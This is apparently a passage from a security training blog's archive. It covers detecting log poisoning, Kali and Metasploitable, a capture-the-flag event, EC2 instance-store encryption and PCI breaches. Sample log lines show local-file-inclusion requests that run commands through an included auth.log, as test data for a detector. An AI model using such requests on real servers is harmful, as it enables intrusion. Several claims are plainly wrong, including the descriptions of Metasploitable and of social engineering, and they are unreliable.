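192.168.1.104 - - [03/Mar/2018:10:06:02 +0000] "GET /lfi/lfi.php?file=/var/log/auth.log&c=ps HTTP/1.1" 200 101211 "-" "Mozilla/5.0"
192.168.1.104 - - [03/Mar/2018:10:06:40 +0000] "GET /lfi/lfi.php?file=../../../../var/log/auth.log&c=pwd HTTP/1.1" 200 101250 "-" "Mozilla/5.0"
"""

# sshd logs the rejected user name verbatim, so everything between
# "invalid user" and " from <ip>" is text the remote client chose.
INVALID_USER_RE = re.compile(
    r"Failed password for invalid user (?P<user>.*?) from "
    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port (?P<port>\d+)",
    re.IGNORECASE,
)
# PHP open tags: <?php, the short tag <? and the echo tag <?=
PHP_TAG_RE = re.compile(r"<\?(?:php\b|=)?", re.IGNORECASE)

# Request line of a combined-format access-log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')
# A file= value that is an absolute path or climbs out of the web root with ../
RISKY_FILE_PARAM_RE = re.compile(r"[?&]file=(?P<value>(?:/|(?:\.\./)+)[^&\s]*)")


def find_poisoned_logins(auth_log: str) -> List[Dict[str, object]]:
    """Return auth.log entries whose rejected user name carries a PHP open tag."""
    hits: List[Dict[str, object]] = []
    for lineno, line in enumerate(auth_log.splitlines(), start=1):
        m = INVALID_USER_RE.search(line)
        if m and PHP_TAG_RE.search(m.group("user")):
            hits.append({"line": lineno, "ip": m.group("ip"), "user": m.group("user")})
    return hits


def find_log_include_requests(access_log: str) -> List[Dict[str, object]]:
    """Return access-log requests whose file= parameter reaches outside the web root."""
    hits: List[Dict[str, object]] = []
    for lineno, line in enumerate(access_log.splitlines(), start=1):
        req = REQUEST_RE.search(line)
        if not req:
            continue
        risky = RISKY_FILE_PARAM_RE.search(req.group("path"))
        if risky:
            hits.append({"line": lineno, "ip": line.split(" ", 1)[0], "file": risky.group("value")})
    return hits


if __name__ == "__main__":
    for hit in find_poisoned_logins(SAMPLE_AUTH_LOG):
        print("poisoned login attempt:", hit)
    for hit in find_log_include_requests(SAMPLE_ACCESS_LOG):
        print("log/file include request:", hit)
```

Both checks are cheap enough to run from a log shipper or a cron job; the first one fires at the moment of poisoning, long before any include request arrives, which is the signal worth alerting on.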

What is Kali Linux? 

One of the most important security tools to understand and work with is, in fact, Kali Linux. Let's discuss its benefits in a nutshell.

⦁ Penetration testers and digital forensics practitioners consider it an essential tool for their purposes.
⦁ It provides its users with a variety of tools and functions which fall into thirteen categories:
  ⦁ Information Gathering, such as Dmitry
  ⦁ Vulnerability Analysis, such as Inguma
  ⦁ Exploitation Tools, such as the Metasploit Framework
  ⦁ Wireless Attacks, such as WIFI Honey
  ⦁ Forensics, such as Binwalk
  ⦁ Web Applications, such as Skipfish
  ⦁ Stress Testing, such as FunkLoad
  ⦁ Sniffing and Spoofing, such as Wireshark
  ⦁ Password Attacks, such as TrueCrack
  ⦁ Maintaining Access, such as Intersect
  ⦁ Hardware Hacking, such as dex2jar
  ⦁ Reverse Engineering, such as Apktool
  ⦁ Reporting Tools, such as MagicTree

What is Metasploitable?

Basically, Metasploitable is an intentionally vulnerable machine intended for purposes such as security training, testing an exploit, or general target practice. The unique aspect about Metasploit is that it has the capability to check vulnerabilities at the operating system and network services layer, not merely at the application layer.

Metasploitable 2 is like a grab bag which contains a bunch of security tools such as Metasploit. A production environment usually has Metasploit 2 to help with the process of examining and practicing the exploitation of vulnerabilities.

Metasploitable 3 is an even newer version of Metasploitable. It is a virtual machine built from the ground up with a large number of security vulnerabilities. With this version, Metasploit is the security tool used to test exploits. Metasploitable3 was originally released under a BSD-style license.

The following are requirements to run Metasploitable:

  1. An operating system which is capable of running all of the required applications listed below.
  2. VT-x/AMD-V Supported Processor recommended
  3. 65 GB Available space on drive
  4. 4.5 GB RAM

So we have mentioned that Metasploitable basically relies on Metasploit in the first place. Let's talk about Metasploit itself in the last few lines.

The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing. Penetration testing refers to an authorized simulated attack on a computer system. It looks for security weaknesses and also supports Intrusion Detection System (IDS) signature development; an IDS, in turn, monitors a network or systems for malicious activities. The best-known sub-project is the open source Metasploit Framework, which is the most common exploit development framework in the world. I will elaborate on this framework later on in this article.

Finally, one could use Metasploit to perform both legitimate and unauthorized accesses and activities on computer systems. In this regard, it is no different from similar commercial products such as Immunity's Canvas or those of Core Security Technologies. Metasploit, however, is commonly used to break into remote systems or to test a computer system for vulnerabilities.


InfoSec Addicts Saturday Hackathon

InfoSec Addicts will be hosting an in-person meet and greet, with some training sessions, an install fest, and a Capture The Flag (CTF). C'mon down to Alexandria, Virginia for the day. Do some networking with other security professionals and get your laptop set up for security. Lunch, dinner, and snacks will be provided.

Install Fest (10th February 2018):

We will run an install fest from 12:30 noon to 3pm EST. This is your chance to bring your laptop and get some help with setting up the following:

  • VMWare/Virtualbox
  • Kali Linux
  • Adding security tools to your Linux host
  • Virtual machine swaps (bring external hard drives)
  • Building your own hacklab

Training Sessions (10th February 2018):

  • Introduction to packet analysis with WireShark taught by Joe McCray (in person and live online from 12:30pm EST to 1:30pm)
  • Advanced Web App Security Testing with Burp Suite taught by Jason Haddix (in person and live online from 4pm EST to 6pm)

Capture The Flag

We will also host a CTF from 7pm – 9pm that is geared towards beginner/intermediate participants.

Location (10th February 2018):

  • 10th February 2018 starting at 12noon
  • 901 North Pitt Street Suite 105
  • Alexandria, Va 223314

Event Schedule (10th February 2018):

  • Lunch & Meet & Greet (12noon)
  • Install fest (12:30noon to 3pm)
  • Introduction to packet analysis with WireShark taught by Joe McCray (in person and live online from 12:30pm EST to 1:30pm)
  • Advanced Web App Security Testing with Burp Suite taught by Jason Haddix (in person and live online from 4pm EST to 6pm)
  • Dinner & networking (6pm)
  • Capture The Flag (7pm)

Event Cost:

  • $50 if purchased before February 5th, 2018
  • $75 if purchased from February 6th to February 9th
  • $100 if purchased at the door
  • NOTE: Prices are the same for online students attending the training sessions


Capture The Flag (CTF) competition

We will be running Capture The Flag (CTF) competitions a few times this year. Here are the particulars:

Location of game: Online

Game Type: Team Network/Web Application/Programming Attack competition

Game Play: Scoring via placing a team file (flag) in the target servers’ root (/root or c:\ directory)

Skill Level: Beginner/Intermediate

Number of players per team: Teams can be up to 15 players

This type of game is very well suited to college infosec groups, CCDC players, security enthusiasts, blue teams, pentest teams, and red teams. It’s a pure attack game. There is no defense necessary, nor system administration tasks to do. You connect to the VPN and have fun attacking the targets in the network and scoring points.

Date/Time:

CTF Prep Class: September 9th from 10 am – 4 pm EST
CTF Prep Class: September 16th from 10 am – 4 pm EST

The CTF Prep students will have access to the target lab network from September 8th – 22nd.

The actual CTF event will be on September 23rd from 12 noon to 8 pm EST.

Cost:

CTF Prep class cost is: $100
CTF Competition is: $50 per participant

Note: CTF Prep class participants receive automatic registration for the CTF Competition

Signup now and let’s have some fun


Game Basics:

This will be a fun game. Each team’s members will be given VPN access to the InfoSec Addicts target lab/CTF environment. Each team will be given a gpg-encrypted file that will serve as the team’s flag. That flag file must be copied to the appropriate directory on the victim server to count as that server being compromised and to have points awarded to that team.

Game Rules:

– One can use Nessus and Metasploit, but beware of bandwidth penalties, so keep scanning to a minimum.
– Password brute-forcing is acceptable
– Using commercial pentesting tools is acceptable (ex: Core, Saint, Canvas)
– The scoring server will verify that a target host has been successfully exploited
– Man-in-the-middle attacks of any kind are NOT acceptable
– Attacking other teams is NOT acceptable


Game Requirements:

Stable internet connection with a minimum of 1Mbit/sec that can connect to UDP 1194 (OpenVPN port)

No commercial VPN licenses required to participate

Game Prizes

1st Place – 3 FREE InfoSec Addicts classes per team participant
2nd Place – 2 FREE InfoSec Addicts classes per team participant
3rd Place – 1 FREE InfoSec Addicts class per team participant

Signup now and let’s have some fun


How to Use Amazon EC2 Instance Store Encryption to Protect Data at Rest?

1. Create an Amazon S3 bucket

The created S3 bucket stores the encrypted password file. The file system is encrypted using this password (key). When an Amazon EC2 instance boots, the file is copied from the bucket, the encrypted password is read and decrypted, and the plaintext password is retrieved. This password is then used to encrypt the file system on the instance store disk. In this first step, an S3 bucket is created so that the encrypted password file can be stored in it; the necessary permissions are applied afterward. If you use an Amazon VPC endpoint for Amazon S3, additional permissions on the bucket are necessary to enable endpoint access.

  1. Sign in to the S3 console and select “Create Bucket”.
  2. Then, enter the bucket name in the box named “Bucket Name”, then click on “Create”.
  3. All the details of the newly created bucket will appear in the right pane.

2. Configure the IAM role and permissions for the created S3 bucket

After the encrypted password file is read from S3, the encrypted password is decrypted using AWS Key Management Service (KMS). By applying the IAM policy configured in this step, a role with the right access permissions to the S3 bucket can be assumed. “your-bucket-name” is the bucket used to store the password file.

  1. Sign in to the AWS Management Console and open the IAM console.
  2. Then go to the navigation pane and select “Policies”.
  3. Afterward, click the “Create Policy” option.
  4. Then, select the “Create Your Own Policy” option.
  5. Give the policy a name and a description, then proceed to the next step.
  6. Copy and paste the following policy at this point.
    {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Sid": "Stmt1478729875000",
                "Effect": "Allow",
                "Action": [
                    "s3:GetObject"
                ],
                "Resource": [
                    "arn:aws:s3:::<your-bucket-name>/LuksInternalStorageKey"
                ]
            }
        ]
    }
  7. Then, select “Create Policy”.
  8. To elaborate on the previous policy: it grants read access to the password object in the bucket. In other words, the encrypted password can be read because it is stored inside this bucket. The IAM role now needs to be configured, since EC2 uses it to apply the previous policy.
  9. Select “Roles” inside the IAM console.
  10. Choose “Create New Role”.
  11. In the first step, “Role Name”, enter a name for the role and then press “Next Step”.
  12. In the second step, “Select Role Type”, select “Amazon EC2” and then press “Next Step”.
  13. In the third step, “Established Trust”, press “Next Step”.
  14. In the fourth step, “Attach Policy”, select the policy created above, as shown in the figure.
  15. In the fifth step, “Review”, review the configuration before finishing. The IAM role just created can now be used with any newly launched EC2 instance, giving it permission to read the encrypted password file stored in the S3 bucket.
  16. The newly created IAM role is now listed on the “Roles” page.
  17. Finally, select “Roles” and then select the newly created role, as illustrated by the figure.
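The policy in step 6 is as narrow as it can be: one action on one object ARN. The following Python script is an added example, not code from the AWS article or from AWS itself; it checks a policy document against that least-privilege shape and reports anything broader. PAGE_POLICY is the step 6 policy verbatim (with the page's own <your-bucket-name> placeholder) and LOOSE_POLICY is a constructed over-broad variant for comparison.

```python
import json
from typing import Any, Dict, List

# The policy from step 6, pasted as the page gives it; <your-bucket-name> is
# the page's own placeholder for the bucket created in step 1.
PAGE_POLICY: Dict[str, Any] = json.loads("""
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "Stmt1478729875000",
            "Effect": "Allow",
            "Action": ["s3:GetObject"],
            "Resource": ["arn:aws:s3:::<your-bucket-name>/LuksInternalStorageKey"]
        }
    ]
}
""")

# A constructed, deliberately over-broad variant (not from the page) of the
# kind that gets pasted in a hurry: every S3 action on every object.
LOOSE_POLICY: Dict[str, Any] = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "TooBroad",
            "Effect": "Allow",
            "Action": "s3:*",
            "Resource": "arn:aws:s3:::<your-bucket-name>/*",
        }
    ],
}

# The only action the boot script needs: reading one object.
REQUIRED_ACTIONS = {"s3:getobject"}


def _as_list(value: Any) -> List[Any]:
    """IAM accepts a string or a list for Statement/Action/Resource; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def audit_key_read_policy(policy: Dict[str, Any], key_object_arn: str) -> List[str]:
    """Return least-privilege findings for a policy meant only to read key_object_arn.

    An empty list means every Allow statement is limited to s3:GetObject on
    exactly that object ARN.
    """
    findings: List[str] = []
    for stmt in _as_list(policy.get("Statement")):
        sid = stmt.get("Sid", "<no Sid>")
        if stmt.get("Effect") != "Allow":
            continue  # Deny statements only narrow access; nothing to flag here.
        if "NotAction" in stmt or "NotResource" in stmt:
            findings.append(f"{sid}: NotAction/NotResource grants everything except the listed items")
        for action in _as_list(stmt.get("Action")):
            if action.lower() not in REQUIRED_ACTIONS:
                findings.append(f"{sid}: action {action!r} is broader than s3:GetObject")
        for resource in _as_list(stmt.get("Resource")):
            if resource != key_object_arn:
                findings.append(f"{sid}: resource {resource!r} is not the single key object {key_object_arn!r}")
    return findings


if __name__ == "__main__":
    arn = "arn:aws:s3:::<your-bucket-name>/LuksInternalStorageKey"
    print("page policy:", audit_key_read_policy(PAGE_POLICY, arn) or "OK")
    for finding in audit_key_read_policy(LOOSE_POLICY, arn):
        print("loose policy:", finding)
```

Run the check against the policy document before attaching it to the role; a wildcard resource would let the same role read every other object that later lands in the bucket.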

3. Encrypt a secret password with KMS and store it in the S3 bucket

In order to accomplish this step, one has to use the AWS CLI. Fortunately, Amazon Linux EC2 instances already have the AWS CLI installed by default. It can also be installed on Windows, Mac, or Linux systems.

  1. Type the following commands in the AWS CLI. The first uses KMS to encrypt the password. Note that you should replace the region (“us-east-1” here) with your own region and “<bucket-name>” with the bucket created in step 1. In addition, creating keys and putting objects in S3 requires specific permissions that must be in place before running these commands.
    aws --region us-east-1 kms encrypt --key-id 'alias/EncFSForEC2InternalStorageKey' --plaintext "ThisIs-a-SecretPassword" --query CiphertextBlob --output text | base64 --decode > LuksInternalStorageKey

    aws s3 cp LuksInternalStorageKey s3://<bucket-name>/LuksInternalStorageKey
  2. After these commands, the file named “LuksInternalStorageKey” contains the encrypted password.
  3. The key alias, which is useful for telling different keys apart, is “EncFSForEC2InternalStorageKey”.

4. Make the KMS key accessible by the role

  1. Go to the IAM console and, in the navigation pane, choose “Encryption keys”.
  2. Then, choose the key alias named “EncFSForEC2InternalStorageKey”.
  3. To add the new role as a user of the key, scroll down to “Key Policy” and select “Add” under “Key Users”.
  4. At this step, choose the newly created role and then press “Attach”.
  5. This grants the role permission to use the key.

5. Configure EC2 with the role and run the configuration

  1. Launch a new instance inside the EC2 console. In the third step, “Configure Instance Details”, the IAM role has to be selected, as shown in the figure.
  2. Expand the “Advanced Details” section on the same screen.
  3. Inside “User Data”, keep “As text” checked, as it is by default. Then, copy and paste the following script into the text box.
    #!/bin/bash
    ## Initial setup to be executed on boot
    ##====================================

    # Create an empty file. This file will be used to host the file system.
    # In this example we create a 2 GB (sparse) file called secretfs (Secret File System).
    dd of=secretfs bs=1G count=0 seek=2

    # Lock down normal access to the file.
    chmod 600 secretfs

    # Associate a loopback device with the file.
    losetup /dev/loop0 secretfs

    # Copy the encrypted password file from S3. The password is used to configure LUKS later on.
    aws s3 cp s3://an-internalstoragekeybucket/LuksInternalStorageKey .

    # Decrypt the password from the file with KMS and keep the secret password in LuksClearTextKey.
    LuksClearTextKey=$(aws --region us-east-1 kms decrypt --ciphertext-blob fileb://LuksInternalStorageKey --output text --query Plaintext | base64 --decode)

    # Encrypt storage in the device. cryptsetup will use the Linux
    # device mapper to create, in this case, /dev/mapper/secretfs.
    # Initialize the volume and set an initial key.
    echo "$LuksClearTextKey" | cryptsetup -y luksFormat /dev/loop0

    # Open the partition, and create a mapping to /dev/mapper/secretfs.
    echo "$LuksClearTextKey" | cryptsetup luksOpen /dev/loop0 secretfs

    # Clear the LuksClearTextKey variable because we don't need it anymore.
    unset LuksClearTextKey

    # Check its status (optional).
    cryptsetup status secretfs

    # Zero out the new encrypted device.
    dd if=/dev/zero of=/dev/mapper/secretfs

    # Create a file system and verify its status.
    mke2fs -j -O dir_index /dev/mapper/secretfs

    # List file system configuration (optional).
    tune2fs -l /dev/mapper/secretfs

    # Mount the new file system to /mnt/secretfs.
    mkdir /mnt/secretfs
    mount /dev/mapper/secretfs /mnt/secretfs
  4. On your account, enable CloudTrail.
  5. Finally, launch the EC2 instance. The instance will copy the password file from S3, use KMS to decrypt it, and configure an encrypted file system.


How to become PCI compliant and still be breached?

What do I need to know about PCI?

  • PCI DSS and PCI SSC:

To minimize this risk, the Payment Card Industry Data Security Standard (PCI DSS) exists. It is designed and maintained by the PCI Security Standards Council (PCI SSC). In a nutshell, it aims to secure online transactions.

Credit card companies enforce these standards themselves. The standards compel every retailer that accepts any form of online payment to comply with a long checklist. This ensures that transactions operate in a safe environment. Such checklists mainly strive to make sure that data and networks are highly secure.

  • Social Engineering:

A computer security professional has to perform certain kinds of psychological manipulation on suspects in order to learn who is responsible for an attack or another similar security incident.

The term is widely used in information security in general, because someone inside the organisation could reveal confidential data, and those responsible for information security ought to detect and investigate such persons.

In one way or another, many consider this a confidence trick. The rationale behind it varies from information gathering to fraud or system access. It is often one of many steps in a more complex fraud scheme. It is used in diverse social sciences, yet computer security is its main domain.

There are plenty of techniques one could use to perform social engineering. Examples of such methods are pretexting, diversion theft, phishing, spear phishing, water holing, baiting, quid pro quo, tailgating, and many others.

  • SSL/TLS/IPsec

In order to ensure secure transmission of data packets across a network, one can rely on three internet protocols that keep such data as secure as possible while in transit. Internet Protocol Security (IPsec) can perform mutual authentication between agents when the session begins. The cryptographic keys to be used during the session are negotiated at that point. This happens either between a pair of hosts (host-to-host), between a pair of security gateways (network-to-network), or between a security gateway and a host (network-to-host).

It is important to understand that IPsec works at the Internet Layer. There are two other similar internet protocols operating at upper layers: Transport Layer Security (TLS) operates at the Transport Layer, while Secure Shell (SSH) functions at the Application Layer.

An insight into the problem

While several organizations claim complete compliance with PCI DSS, many still suffer actual breaches, losing a lot of money and investment. We have to dig into the grounds of this problem in order to take accurate actions accordingly.

First of all, let's discuss the reasons for this state of affairs.

  1. One hundred percent security is impossible and unachievable by any means. Despite the fact that the PCI DSS standards are excellent and lead to much more secure online payment methods, they can never become the end or the ultimate goal of an organization.

There can never be perfect security for an organization. That is why banks still experience robberies to date, regardless of how secure they are. The only advantage of such standards lies in the fact that the number of successful robberies becomes much smaller, but it never vanishes.

  2. Several methods are used to get around controls that are compliant with PCI standards. This leads to a breach even when the organization is PCI compliant. The following points discuss these methods:
    1. Imagine that a professional attacker freshly develops a piece of malware and manages to get it past all the antivirus or anti-malware systems inside the organization. This is possible because such new malware usually has no signature that would make it recognizable to anti-malware software. Consequently, even while an antivirus is running on the organization's network or systems, new malware can initially pass through without detection.
    2. As is known, malware only has to find its way into the network, and the desired data can be collected in time. But how does the malware get into the network in the first place? The answer is social engineering and spear phishing. This term refers to emails that appear to come from a friend or someone inside the organization. However, the actual sender is the same individual who is after personal data such as passwords, credit card numbers, bank account numbers, and the financial information on your personal computer (PC). One way such an attack is performed effectively is by sending a link from a bunch of the organization's email addresses to the addresses of other peers inside the same organization. Thereafter, when someone simply clicks on the link, the malware spreads inside the network. That is why security training is highly recommended to cut down the hazardous numbers of such attacks.
    3. The problem here is that everything looks normal, with no sign of a threat from such malware. Why is that? Fundamentally, when an attacker launches malware that scans a network for open ports or other vulnerabilities, the scans run very slowly, so that no heavy traffic is generated by them. This makes the traffic look like normal traffic. On the other hand, when a penetration tester scans a network for vulnerabilities, heavy traffic is generated, which is then detected as someone trying to scan the network.
    4. Furthermore, the backdoor software used by an attacker relies on protocols such as SSL/TLS/IPsec to encrypt its transmissions on port 80 or 443, which are both open for internet access. Such encrypted packets are not usually recognizable as malware by antivirus programs.
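Point 3 above is exactly the case a per-minute "port scan" rule misses: one probe every twenty minutes never trips a short-window threshold. The Python script below is an added example (not code from the original article) that parses a constructed connection log and counts distinct destination ports per source over a sliding window, so the same data can be evaluated with a short window and with a long baseline window. The log format, the 10.0.0.x addresses and the thresholds are assumptions.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Constructed connection log (not from any real network): "timestamp src dst dport".
# 10.0.0.9 touches a new port on the same host every twenty minutes, which is the
# slow probing the text describes; 10.0.0.5 is an ordinary client using two services.
SAMPLE_CONN_LOG = """\
2018-02-10T08:00:00 10.0.0.9 10.0.1.20 21
2018-02-10T08:05:00 10.0.0.5 10.0.1.20 443
2018-02-10T08:06:00 10.0.0.5 10.0.1.20 80
2018-02-10T08:20:00 10.0.0.9 10.0.1.20 22
2018-02-10T08:40:00 10.0.0.9 10.0.1.20 23
2018-02-10T09:00:00 10.0.0.9 10.0.1.20 25
2018-02-10T09:15:00 10.0.0.5 10.0.1.20 443
2018-02-10T09:20:00 10.0.0.9 10.0.1.20 80
2018-02-10T09:40:00 10.0.0.9 10.0.1.20 110
2018-02-10T10:00:00 10.0.0.9 10.0.1.20 143
2018-02-10T10:10:00 10.0.0.5 10.0.1.20 443
2018-02-10T10:20:00 10.0.0.9 10.0.1.20 443
"""

Event = Tuple[datetime, str, str, int]


def parse_conn_log(text: str) -> List[Event]:
    """Parse the four-column format above into (timestamp, src, dst, dport) tuples."""
    events: List[Event] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, port = line.split()
        events.append((datetime.fromisoformat(ts), src, dst, int(port)))
    return events


def max_distinct_ports(events: List[Event], window_seconds: int) -> Dict[str, int]:
    """For each source, the largest number of distinct destination ports it touched
    within any span of window_seconds (sliding window over time-sorted events)."""
    window = timedelta(seconds=window_seconds)
    by_src: Dict[str, List[Tuple[datetime, int]]] = defaultdict(list)
    for ts, src, _dst, port in events:
        by_src[src].append((ts, port))
    result: Dict[str, int] = {}
    for src, items in by_src.items():
        items.sort()
        in_window: Counter = Counter()  # port -> number of events inside the window
        left = 0
        best = 0
        for ts, port in items:
            in_window[port] += 1
            # Drop events that fell out of the window ending at `ts`.
            while ts - items[left][0] > window:
                old_port = items[left][1]
                in_window[old_port] -= 1
                if in_window[old_port] == 0:
                    del in_window[old_port]
                left += 1
            best = max(best, len(in_window))
        result[src] = best
    return result


def flag_scanners(events: List[Event], window_seconds: int, min_ports: int) -> List[str]:
    """Sources that reached at least min_ports distinct ports inside one window."""
    return sorted(src for src, n in max_distinct_ports(events, window_seconds).items() if n >= min_ports)


if __name__ == "__main__":
    evts = parse_conn_log(SAMPLE_CONN_LOG)
    # A one-minute rule, typical of a port-scan signature, sees nothing...
    print("1-minute window:", flag_scanners(evts, 60, min_ports=5))
    # ...while a four-hour baseline over the same events exposes the slow scan.
    print("4-hour window:  ", flag_scanners(evts, 4 * 3600, min_ports=5))
```

The trade-off is state: a long window has to remember per-source port sets for hours, so in practice this runs as a periodic aggregation over stored flow records rather than inline on the sensor.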
